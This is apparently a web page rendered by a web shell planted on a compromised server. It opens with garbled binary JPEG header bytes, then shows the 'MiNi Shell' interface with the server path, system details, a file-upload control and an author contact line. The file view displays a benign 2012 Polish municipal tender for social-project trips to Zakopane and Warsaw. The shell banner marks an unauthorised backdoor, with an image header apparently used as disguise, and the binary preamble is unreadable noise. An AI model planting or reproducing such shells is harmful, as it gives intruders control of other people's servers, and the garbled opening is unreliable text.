JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120809/294422-N-2012.html

<p class="kh_header"><b>Kraków: Świadczenie usług turystycznych w związku z realizacją projektu socjalnego realizowanego przez MOPS w Krakowie</b><br>
<b>Numer ogłoszenia: 294422 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług turystycznych w związku z realizacją projektu socjalnego realizowanego przez MOPS w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup dwóch usług turystycznych w związku z realizacją projektu socjalnego realizowanego przez MOPS w Krakowie, zgodnie z poniższymi wytycznymi:

1.	Wyjazd do Zakopanego
Termin wycieczki: 28.08.2012 - 30.08.2012 r.
Ilość uczestników: 30 (dzieci w wieku 7-11 lat) + 4 opiekunów ze strony Zamawiającego
Program wycieczki:

Dzień 1
godz. 7:45 zbiórka uczestników przy skrzyżowaniu ulic Wrocławskiej 
i Śląskiej w Krakowie,
godz. 8:00 wyjazd,
godz. 10:30 przyjazd do miejsca pobytu i zakwaterowanie,
13:00-14:00 obiad wg menu na osobę:
	rosół z makaronem 200ml,
	filet z kurczaka 90 g,
	frytki 100 g,
	surówka z marchwi z jabłkiem 100 g,
	sok owocowy 250 ml,
14:30 - 16:00 spacer po Krupówkach,
16:30 - 18:30 zajęcia integracyjne w miejscu pobytu (przygotowane 
i przeprowadzone przez pracowników Zamawiającego),
19:00 kolacja wg menu na osobę:
	pieczywo 100 g,
	parówki drobiowe 100 g,
	serek topiony 1szt 100 g,
	herbata 200 ml,
	jabłko.

Dzień 2
godz. 8:00 - 8:45 śniadanie wg menu na osobę:
	pieczywo 3 x bułka po 50g,
	szynka drobiowa 50g,
	ser żółty 50g,
	masło 2g,
	dżem owocowy 20g ,
	jogurt owocowy 150 g,
	herbata 200 ml,                
9:30 - 13:30 spacer Doliną Kościeliską i zwiedzanie Jaskini Mroźnej z  przewodnikiem górskim,
14:00 - 15:00 obiad wg menu na osobę:
	zupa pomidorowa z makaronem 200 ml,
	pieczone udko z kurczaka,
	ziemniaki 100g,
	surówka z ogórków 100g,
	woda mineralna niegazowana 200 ml,
	drożdżówka,
15:30 - 18:00 zajęcia integracyjne w miejscu pobytu (przygotowane 
i przeprowadzone przez pracowników Zamawiającego),
18:30 ognisko, połączone z kolacją wg menu na osobę:
	kiełbasa 150 g,
	pieczywo 2 bułki po 50 g,
	herbata 200ml,
	keczup 20 g.

Dzień 3
godz. 8:00 - 8:45 śniadanie wg menu na osobę:
	pieczywo 3 x bułka po 50g,
	szynka drobiowa 50g,
	ser żółty 50g,
	masło 2g,
	dżem owocowy 20g ,
	jogurt owocowy 150 g,
	herbata 200 ml,                
9:30 - 12:00 wycieczka na Gubałówkę. Wyjazd kolejką linowo-terenową, zejście pieszo z przewodnikiem górskim. W przypadku niekorzystnych warunków atmosferycznych - zjazd kolejką linowo-terenową.
12:30 - 13:30 wykwaterowanie
13:30 -  14:30 obiad wg menu na osobę:
	barszcz biały 200 ml z jajkiem 1 szt.,
	kotlet schabowy, 150 g,
	ziemniaki  100 g,
	sałata ze śmietaną 150 g,
	banan - 1 sztuka,
	sok owocowy 200 ml,
15:00 - 16:00 zwiedzanie skoczni narciarskiej,
16:00 wyjazd do Krakowa.
Wykonawca zapewni:
a)	transport autokarowy  (autokar wyposażony w klimatyzację lub możliwość otwierania okien). Wykonawca zapewni sprawdzenie stanu technicznego autokaru przez Policję w dniu wyjazdu. Kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Kierowca musi posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika. Wykonawca zapewni autokar sprawny technicznie. Przewoźnik musi posiadać wymagane prawem ubezpieczenia. Kierowca jest zobowiązany do dbania o czystość autokaru podczas podróży,
b)	ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków (NNW) na kwotę co najmniej 10 000 zł. na każdego uczestnika. Uczestnicy wyjazdów muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków. Wykonawca przedłoży Zamawiającemu polisę ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu,
c)	opłaty: parkingową, klimatyczną, wstępu do Tatrzańskiego Parku Narodowego, zwiedzanych obiektów,
d)	świadczenia dla przedstawicieli Zamawiającego, takie same jak dla uczestników wycieczek,
e)	właściwą jakość przygotowanego posiłków z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej, 
f)	opiekę pielęgniarską lub opiekę lekarską (w razie potrzeby) polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodni/szpitala. Wszelkie koszty pomocy lekarskiej pokrywa Wykonawca,
g)	zakwaterowanie w ośrodku zlokalizowanym w Zakopanym lub w odległości nie większej niż 5 km od granic administracyjnych Zakopanego
(Wykonawca zobowiązany jest podać w ofercie nazwę i adres ośrodka), wyposażonym w:
	pokoje 1, 2, 3, 4 - osobowe, wyposażone w łazienki (w tym 4 pokoje 1- osobowe),
	salę umożliwiającą przeprowadzenie zajęć integracyjnych dla co najmniej 34 osób, do której podczas zajęć nie będą miały wstępu osoby postronne,
	jadalnię, 
	miejsce na ognisko.

2.	Wyjazd do Warszawy
1)	termin wycieczki: we wrześniu lub październiku 2012 roku
2)	Ilość uczestników: 40 (osoby dorosłe) + 1 opiekun ze strony Zamawiającego
3)	Program wycieczki:
a)	godz. 6:30 zbiórka uczestników przy skrzyżowaniu ulic Wrocławskiej 
i Śląskiej w Krakowie,
b)	godz. 6:45 wyjazd 
c)	godz. 11:30 - 14:00 zwiedzanie Warszawy:
	przejazd Traktem Królewskim (Al. Ujazdowskie, Nowy Świat, Krakowskie Przedmieście),
	Plac Piłsudskiego,
	Plac Teatralny,
	Stare Miasto: Barbakan, Plac Zamkowy, rynek.
d)	14:00 - 15:00 obiad w restauracji lub barze wg menu na osobę:
	zupa pomidorowa z makaronem 200 ml,
	pieczone udko z kurczaka 200 g,
	 ziemniaki 150 g,
	 surówka z ogórków 100 g,
	sok owocowy 200 ml,
	drożdżówka,
godz. 15:30 - 18:30 zwiedzanie z przewodnikiem Muzeum Powstania Warszawskiego,
godz. 19:00 wyjazd do Krakowa
4)	Wykonawca zapewni:
a)	transport autokarowy  (autokar wyposażony w WC, barek, klimatyzację lub możliwość otwierania okien). Wykonawca zapewni sprawdzenie stanu technicznego autokaru przez Policję w dniu wyjazdu. Kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Kierowca musi posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika. Wykonawca zapewni autokar sprawny technicznie. Przewoźnik musi posiadać wymagane prawem ubezpieczenia. Kierowca jest zobowiązany do dbania o czystość autokaru podczas podróży,
b)	ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków (NNW) na kwotę co najmniej 10 000 zł. na każdego uczestnika. Uczestnicy wyjazdów muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków. Wykonawca przedłoży Zamawiającemu polisę ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu,
c)	opłaty: parkingową, wstępu do zwiedzanych obiektów,
d)	świadczenia dla przedstawiciela Zamawiającego, takie same jak dla uczestników wycieczek,
e)	właściwą jakość posiłków z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej,
f)	opiekę medyczną (w razie potrzeby) polegającą na wezwaniu pogotowia lub dowiezieniu uczestnika do przychodni/szpitala. Wszelkie koszty pomocy lekarskiej pokrywa Wykonawca,
g)	opiekę pilota na całej trasie wycieczki. 

3.	Zamawiający dopuszcza możliwość zmiany kolejności zwiedzania i harmonogramu wycieczek oraz dopuszcza możliwość zmiany terminu jeżeli warunki atmosferyczne lub inne czynniki niezależne od Zamawiającego będą uzasadniały przesunięcie terminu.
4.	Warunki płatności:
1)	Wykonawca doręczy Zamawiającemu fakturę po realizacji danego wyjazdu  w terminie do 5 dni roboczych.
2)	Płatność nastąpi na rachunek bankowy Wykonawcy wskazany w fakturze, w terminie do 14 dni od daty przyjęcia faktury przez Zamawiającego.
3)	W przypadku gdy Zamawiający powiadomi Wykonawcę o rezygnacji uczestnika z wycieczki na co najmniej 1 dzień roboczy przed dniem wyjazdu, Wykonawcy nie będzie przysługiwało wynagrodzenie za udział tego uczestnika.
4)	W przypadku gdy Zamawiający powiadomi Wykonawcę o rezygnacji uczestnika z wycieczki na co najmniej 3 dni robocze przed dniem wyjazdu, Wykonawcy nie będzie przysługiwało wynagrodzenie za udział tego uczestnika. (dotyczy wycieczki do Zakopanego).
5)	W przypadku gdy Zamawiający powiadomi Wykonawcę o rezygnacji uczestnika z wycieczki w terminie krótszym, niż 3 dni robocze przed dniem wyjazdu, Wykonawcy będzie przysługiwało wynagrodzenie należne tytułem noclegu uczestnika (dotyczy wycieczki do Zakopanego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca lub podwykonawca musi posiadać wpis do Rejestru Organizatorów Turystyki i Pośredników  Turystycznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną w formie pisemnej pod rygorem nieważności.
2.	Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia oraz warunki płatności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com